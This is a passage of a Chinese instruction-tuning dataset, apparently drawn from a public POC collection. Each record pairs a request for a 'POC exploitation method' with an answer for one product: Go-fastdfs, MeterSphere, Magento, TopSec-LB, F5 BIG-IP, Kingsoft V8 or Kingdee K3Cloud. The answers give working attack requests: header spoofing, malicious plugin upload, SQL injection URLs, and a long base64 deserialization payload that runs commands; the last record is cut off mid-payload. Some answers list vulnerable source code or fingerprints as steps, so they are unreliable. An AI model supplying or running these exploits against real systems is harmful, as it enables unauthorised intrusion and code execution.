  672. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Go-fastdfs GetClientIp 未授权访问漏洞\n漏洞描述:Go-fastdfs GetClientIp方法存在XFF头绕过漏洞,攻击者通过漏洞可以未授权调用接口,获取配置文件等敏感信息\n影响版本:``` Go-fastdfs ```\n网络测绘:``` \"go-fastdfs\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"go-fastdfs\"\n2. /group1/reload?action=get\n3. /group1/reload?action=get\n\nX-Forwarded-For: 127.0.0.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md"}
    673. 

  673. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MeterSphere 插件接口未授权访问及远程代码执行\n漏洞描述:MeterSphere是基于GPLv3协议的一站式的开源持续测试平台。在其1.16.3版本及以前,插件相关管理功能未授权访问,导致攻击者可以通过上传插件的方式在服务器中执行任意代码。 参考连接: - <https://xz.aliyun.com/t/10772>\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker compose up -d\n2. POST /plugin/add HTTP/1.1\nHost: localhost:8081\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJV2KX1EL5qmKWXsd\nContent-Length: 11985\n\n------WebKitFormBoundaryJV2KX1EL5qmKWXsd\nContent-Disposition: form-data; name=\"file\"; filename=\"Evil.jar\"\n\n[Paste your jar file]\n------WebKitFormBoundaryJV2KX1EL5qmKWXsd--\n3. POST /plugin/customMethod HTTP/1.1\nHost: localhost:8081\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/json\nContent-Length: 89\n\n{\n  \"entry\": \"org.vulhub.Evil\",\n  \"request\": \"id\"\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/MeterSphere 插件接口未授权访问及远程代码执行.md"}
    674. 

  674. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Magento 2.2 SQL注入漏洞\n漏洞描述:Magento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。 其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。 参考链接: - https://www.ambionics.io/blog/magento-sqli - https://devdocs.magento.com/guides/v2.2/release-notes/ReleaseNotes2.2.8CE.html\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. http://your-vp-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d0)+--+-\n3. http://your-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d1)+--+-\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Magento 2.2 SQL注入漏洞.md"}
    675. 

  675. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:天融信 TopApp-LB enable_tool_debug.php 远程命令执行漏洞\n漏洞描述:天融信 TopSec-LB enable_tool_debug.php文件存在 远程命令执行漏洞,通过命令拼接攻击者可以执行任意命令\n影响版本:``` 天融信 TopSec-LB ```\n网络测绘:``` app=\"天融信-TopApp-LB-负载均衡系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 天融信 TopSec-LB\n2. app=\"天融信-TopApp-LB-负载均衡系统\"\n3. <?php\nrequire_once dirname(__FILE__).\"/../common/commandWrapper.inc\";\nerror_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);\n$val = $_GET['val'];\n$tool = $_GET['tool'];\n$par = $_GET['par'];\nrunTool($val,$tool,$par);\n?>\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/天融信 TopApp-LB enable_tool_debug.php 远程命令执行漏洞.md"}
    676. 

  676. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:F5 BIG-IP 远程代码执行漏洞 CVE-2020-5902\n漏洞描述:2020年07月03日, 360CERT监测发现 `F5` 发布了 `F5 BIG-IP 远程代码执行` 的风险通告,该漏洞编号为 `CVE-2020-5902`,漏洞等级:`严重`。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 `F5 BIG-IP` 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。\n影响版本:``` F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1.2.6 F5 BIG-IP 13.x: 13.1.3.4 F5 BIG-IP 12.x: 12.1.5.2 F5 BIG-IP 11.x: 11.6.5.2 ```\n网络测绘:``` title=\"BIG-IP&reg ;- Redirect\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-5902\n【POC利用方法】\n1. F5 BIG-IP 15.x: 15.1.0.4\nF5 BIG-IP 14.x: 14.1.2.6\nF5 BIG-IP 13.x: 13.1.3.4\nF5 BIG-IP 12.x: 12.1.5.2\nF5 BIG-IP 11.x: 11.6.5.2\n2. title=\"BIG-IP&reg ;- Redirect\"\n3. if (\"POST\".equalsIgnoreCase(request.getMethod())) {\n            String[] cmdArray = command.split(\" \");\n            String operation = cmdArray[0];\n            String module = cmdArray[2];\n            if (!ShellCommandValidator.checkForBadShellCharacters(command) && (operation.equals(\"create\") || operation.equals(\"delete\") || operation.equals(\"list\") || operation.equals(\"modify\")) && WHITELISTED_TMSH_MODULES.contains(module)) {\n               try {\n                  String[] args = new String[]{command};\n                  Result result = Syscall.callElevated(Syscall.TMSH, args);\n                  output = result.getOutput();\n                  error = result.getError();\n               } catch (CallException var11) {\n                  logger.error(NLSEngine.getString(\"ilx.workspace.error.TmshCommandFailed\") + \": \" + var11.getMessage());\n                  error = var11.getMessage();\n               }\n            } else {\n               error = NLSEngine.getString(\"ilx.workspace.error.RejectedTmshCommand\");\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/F5 BIG-IP 远程代码执行漏洞 CVE-2020-5902.md"}
    677. 

  677. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞\n漏洞描述:金山 V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件\n影响版本:``` 金山 V8 终端安全系统 ```\n网络测绘:``` title=\"在线安装-V8+终端安全系统Web控制台\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 金山 V8 终端安全系统\n2. title=\"在线安装-V8+终端安全系统Web控制台\"\n3. <?php  \n  if(stripos($_POST['filepath'],\"..\") !== false) {\n    echo 'no file founggd';\n    exit();\n  }\n  ini_set(\"open_basedir\", \"../\");\n  $file_path = '../'.iconv(\"utf-8\",\"gb2312\",$_POST['filepath']);\n  if(!file_exists($file_path)){\n    echo 'no file founggd';\n    exit();\n  }  \n\n  $fp=fopen($file_path,\"r\");  \n  $file_size=filesize($file_path); \n\n  $buffer=5024;  \n  $file_count=0;  \n\n  while(!feof($fp) && $file_count<$file_size){  \n    $file_con=fread($fp,$buffer);  \n    $file_count+=$buffer;  \n    echo $file_con;  \n  }  \n  fclose($fp);  \n?>\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞.md"}
    678. 

  678. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金蝶 K3Cloud BinaryFormatter 反序列化漏洞\n漏洞描述:由于金蝶云星空能够使用 format 参数指定数据格式为二进制,攻击者可以通过发送由 BinaryFormatter 恶意序列化后的数据让服务端进行危险的BinaryFormatter 反序列化操作。反序列化过程中没有对数据进行签名或校验,导致攻击者可以在未授权状态下进行服务器远程代码执行。\n影响版本:``` 金蝶云星空 < 6.2.1012.4 7.0.352.16 < 金蝶云星空 <7.7.0.202111 8.0.0.202205 < 金蝶云星空 < 8.1.0.20221110 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 金蝶云星空 < 6.2.1012.4\n7.0.352.16 < 金蝶云星空 <7.7.0.202111\n8.0.0.202205 < 金蝶云星空 < 8.1.0.20221110\n2. POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1\nHost: your-ip\nContent-Type: text/json\n \n{\"ap0\":\"asdas\",\"format\":\"3\"}\n .\\ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c \"a.cs;System.Windows.Forms.dll;System.Web.dll;System.dll\"\n3. POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1\nHost: your-ip\nContent-Type: text/json\ncmd: dir\n \n{\"ap0\":\"AAEAAAD/AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rp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NzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5